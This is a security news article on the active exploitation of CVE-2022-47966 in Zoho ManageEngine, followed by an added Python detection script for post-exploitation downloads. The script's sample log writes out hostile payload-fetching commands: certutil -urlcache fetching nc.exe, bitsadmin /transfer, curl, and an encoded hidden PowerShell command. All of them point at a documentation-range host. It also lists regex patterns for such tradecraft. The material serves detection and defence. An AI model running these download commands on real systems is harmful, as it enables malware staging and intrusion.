Bitdefender Labs has reported that multiple threat actors are actively exploiting CVE-2022-47966, an unauthenticated remote code execution flaw in Zoho ManageEngine products that have SAML single sign-on enabled (for some of the affected products, having had it enabled in the past is enough). Once code execution is obtained, the attackers use built-in Windows tools such as certutil.exe, bitsadmin.exe, powershell.exe, or curl.exe to download and drop malware on the target systems.
Threat actors are targeting victims all over the world in various industries with most of the attacks targeted at entities in Australia, Canada, Italy, Mexico, the Netherlands, Nigeria, Ukraine, the U.K., and the U.S.
Bitdefender Labs observed a global increase in attacks using the CVE-2022-47966 exploit, which affects around two dozen ManageEngine products, including Access Manager Plus, ADManager Plus, Password Manager Pro, Remote Access Plus, and Remote Monitoring and Management (RMM).
The root cause is an outdated third-party dependency bundled with the ManageEngine products, Apache Santuario (the Apache XML Security for Java library); the old version accepts XSLT transforms inside the XML signature of a SAML response, which an unauthenticated attacker can turn into code execution. In mid-January 2023, Horizon3 researchers released a proof-of-concept (PoC) exploit for CVE-2022-47966 together with a technical analysis, and shortly after that release Bitdefender Labs began seeing exploitation attempts.
Bitdefender's analysis puts the number of vulnerable ManageEngine servers reachable from the internet at between 2,000 and 4,000. The observed attacks aimed to deploy Netcat, Cobalt Strike beacons, RAT-el (an open-source penetration testing tool used here as a remote access trojan), and other payloads on the compromised systems.
Bitdefender identified four main clusters of attacker activity. Users are advised to apply Zoho's patches as soon as possible, to limit the internet exposure of these servers, and to monitor for the built-in download tools named above being launched by the ManageEngine service process.
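The living-off-the-land pattern described above (certutil.exe, bitsadmin.exe, powershell.exe or curl.exe fetching a payload after the exploit lands) is a good detection hook. The following is an added example, not code from Bitdefender's report, that runs that logic over process-creation telemetry. It assumes records carrying the parent image, image and command line (constructed tab-separated key=value lines here, not a Sysmon schema), that the exploited ManageEngine service runs as a java.exe under an install path containing "ManageEngine" (an assumption about the install layout), and a hand-picked set of command-line markers for download behaviour that you would tune to your own estate.

```python
"""Flag download-style use of Windows built-ins spawned by a ManageEngine Java process.

Added illustration; the log format, install-path assumption and marker patterns are
constructed for this example, not taken from the report.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Built-in tools the report names as the payload droppers.
LOLBINS = {"certutil.exe", "bitsadmin.exe", "powershell.exe", "curl.exe"}

# Command-line markers of download/staging behaviour per tool (assumed; tune locally).
DOWNLOAD_MARKERS = {
    "certutil.exe": re.compile(r"-urlcache|-split|-decode", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.I),
    "powershell.exe": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|-enc\w*\s", re.I
    ),
    "curl.exe": re.compile(r"https?://", re.I),
}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    severity: str
    reason: str
    event: ProcessEvent


def parse_event(line: str) -> ProcessEvent:
    """Parse one tab-separated key=value record (constructed format for this example)."""
    fields = {}
    for part in line.rstrip("\n").split("\t"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    return ProcessEvent(
        fields.get("ParentImage", ""), fields.get("Image", ""), fields.get("CommandLine", "")
    )


def _basename(path: str) -> str:
    # ntpath handles Windows separators regardless of the analysis host's OS.
    return ntpath.basename(path).lower()


def _is_manageengine_java(parent_image: str) -> bool:
    # Assumption: the vulnerable product's service is a java.exe inside an install tree
    # whose path contains "ManageEngine". Adjust the path test to your deployment.
    return _basename(parent_image) == "java.exe" and "manageengine" in parent_image.lower()


def evaluate(event: ProcessEvent) -> Optional[Finding]:
    """Return a Finding if the event matches the post-exploitation pattern, else None."""
    image = _basename(event.image)
    if image not in LOLBINS:
        return None
    downloads = bool(DOWNLOAD_MARKERS[image].search(event.command_line))
    if _is_manageengine_java(event.parent_image):
        # Any of these tools under the ManageEngine Java process is abnormal;
        # a download-style command line on top of that is the reported tradecraft.
        severity = "high" if downloads else "medium"
        return Finding(severity, f"{image} spawned by ManageEngine java.exe", event)
    if downloads:
        # Same tooling elsewhere is common admin activity: surface it, but quietly.
        return Finding("low", f"{image} download-style command line", event)
    return None


def scan(lines: Iterable[str]) -> List[Finding]:
    findings = []
    for line in lines:
        if line.strip():
            finding = evaluate(parse_event(line))
            if finding:
                findings.append(finding)
    return findings


def _rec(parent: str, image: str, cmd: str) -> str:
    return f"ParentImage={parent}\tImage={image}\tCommandLine={cmd}"


ME_JAVA = r"C:\ManageEngine\ADManager Plus\jre\bin\java.exe"
SYS32 = r"C:\Windows\System32"

# Constructed sample telemetry (203.0.113.0/24 is a documentation range, not a real C2).
SAMPLE_LOG = [
    _rec(ME_JAVA, SYS32 + r"\certutil.exe",
         r"certutil.exe -urlcache -split -f http://203.0.113.10/nc.exe C:\Windows\Temp\nc.exe"),
    _rec(ME_JAVA, SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    _rec(r"C:\Windows\explorer.exe", SYS32 + r"\curl.exe",
         "curl.exe https://203.0.113.10/update.bin -o update.bin"),
    _rec(SYS32 + r"\svchost.exe", SYS32 + r"\certutil.exe", "certutil.exe -verify cert.cer"),
    _rec(ME_JAVA, SYS32 + r"\cmd.exe", "cmd.exe /c whoami"),
    _rec(ME_JAVA, SYS32 + r"\bitsadmin.exe",
         "bitsadmin.exe /transfer job /download /priority high http://203.0.113.10/b.exe C:\\Windows\\Temp\\b.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity}] {f.reason}: {f.event.command_line}")
```

The cmd.exe line in the sample deliberately produces no finding: the rule is scoped to the four tools the report names, so widen `LOLBINS` (or add a generic "ManageEngine java.exe spawned a shell" rule) if you want broader coverage of that parent process.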